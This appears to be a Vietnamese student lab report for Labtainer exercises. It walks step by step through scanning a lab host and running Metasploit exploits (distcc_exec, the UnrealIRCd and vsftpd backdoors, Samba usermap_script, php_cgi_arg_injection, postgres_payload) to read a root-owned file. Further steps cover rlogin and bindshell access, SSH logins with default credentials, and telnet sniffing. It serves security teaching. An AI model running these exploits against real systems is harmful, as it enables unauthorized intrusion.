Bài 1: Khai thác lỗ hổng dịch vụ sử dụng MetasploitBước 1: labtainer -r metasploit Bước 2: ifconfig... - Trên terminal gõ: “sudo msfconsole”- Tìm và tấn công dịch vụ distccd: search dis
Trang 1Bài 1: Khai thác lỗ hổng dịch vụ sử dụng Metasploit
Bước 1: labtainer -r metasploit
Bước 2: ifconfig
Trang 2Bước 3: Kiểm tra kết nối bằng ping
Bước 4: Quét các dịch vụ có thể tấn công: nmap -p0-65535 192.168.1.2
Trang 3Bước 5: Khai thác dịch vụ cổng 513: rlogin -l root 192.168.1.2
cat /root/filetoview.txt
Bước 6: Khai thác cổng dịch vụ 1524: telnet 192.168.1.2 1524 -> cat /root/filetoview.txt
Bước 7: Khai thác dịch vụ distccd (cổng 3632) sử dụng Metasploit:
Trang 4- Trên terminal gõ: “sudo msfconsole”
- Tìm và tấn công dịch vụ distccd: search distccd
- Sử dụng công cụ khai thác: use exploit/unix/misc/distcc_exec
Trang 5- Xem cấu hình liên quan đến exploit: options
- Đặt RHOST: set RHOST 192.168.1.2
Trang 6- Khai thác lỗ hổng: exploit
- Đọc file : cat /root/filetoview.txt
Trang 7Bước 8: Khai thác lỗ hổng IRC daemon (cổng 6667): Các bước thực hiện tương tự
“sudo msfconsole” -> search unreal_ircd ->
use exploit/unix/irc/unreal_ircd_3281_backdoor
->set RHOST 192.168.1.2->exploit
->cat /root/filetoview.txt
Bước 9: Khai thác dịch vụ VSFtpd (cổng 21):
“sudo msfconsole” -> search vsftpd_234->
use exploit/unix/ftp/vsftpd_234_backdoor
->set RHOST 192.168.1.2->exploit
->cat /root/filetoview.txt
Bước 10: Khai thác dịch vụ Samba service (cổng 139):
“sudo msfconsole” -> search usermap_script->
use exploit/multi/samba/usermap_script
->set RHOST 192.168.1.2->exploit
->cat /root/filetoview.txt
Bước 11: Khai thác dịch vụ HTTP (cổng 80):
“sudo msfconsole” -> search php_cgi->
use exploit/multi/http/php_cgi_arg_injection
->set RHOST 192.168.1.2->exploit->cat /root/filetoview.txt
Bước 12: Khai thác dịch vụ Postgres (cổng 5432):
Trang 8“sudo msfconsole” -> search postgres_payload
->use exploit/linux/postgres/postgres_payload
->set RHOST 192.168.1.2->exploit
->cat /root/filetoview.txt
Bước 13: Kết thúc bài lab: stoplab metasploit
Bài 4: Phát hiện các lỗ hổng bảo mật sử dụng công cụ rà quét
Bước 1: Xác định IP của máy
Bước 2: Trên máy khách mycomputer sử dụng nmap để tìm ra địa chỉ IP của
Trang 9nmap để tìm cổng dịch vụ đang mở trên máy friedshrimp biết rằng cổng (port)
nằm từ 2000-3000
Bước 3: Sau khi xác định được cổng ssh đang mở Sử dụng ssh để truy cập vào
máy chủ Tên máy chủ và mật khẩu là: ubuntu
Trang 10Bước 4: Sau khi truy cập được vào máy chủ friedshrimp đi tìm file
friedshrimp.txt Mở và đọc file
Bước 5: Kết thúc bài lab: stoplab nmap-discovery
Bài 9: Sử dụng công cụ truy cập từ xa
Trang 11Bước 1: Xác định IP của các máy
Bước 2: Trên máy khách sử dụng telnet để kết nối với máy chủ thông qua địa chỉ IP
Bước 3: Sau khi đăng nhập vào máy chủ, thực hiện việc đọc tệp có sẵn
chứa đoạn mật mã
Trang 12Bước 4: Trên server, chạy tcpdump để hiển thị lưu lượng mạng TCP và Thực hiện ssh từ máy khách vào máy chủ và đọc dữ liệu trên máy chủ
Bước 5: Kết thúc bài lab: stoplab telnetlab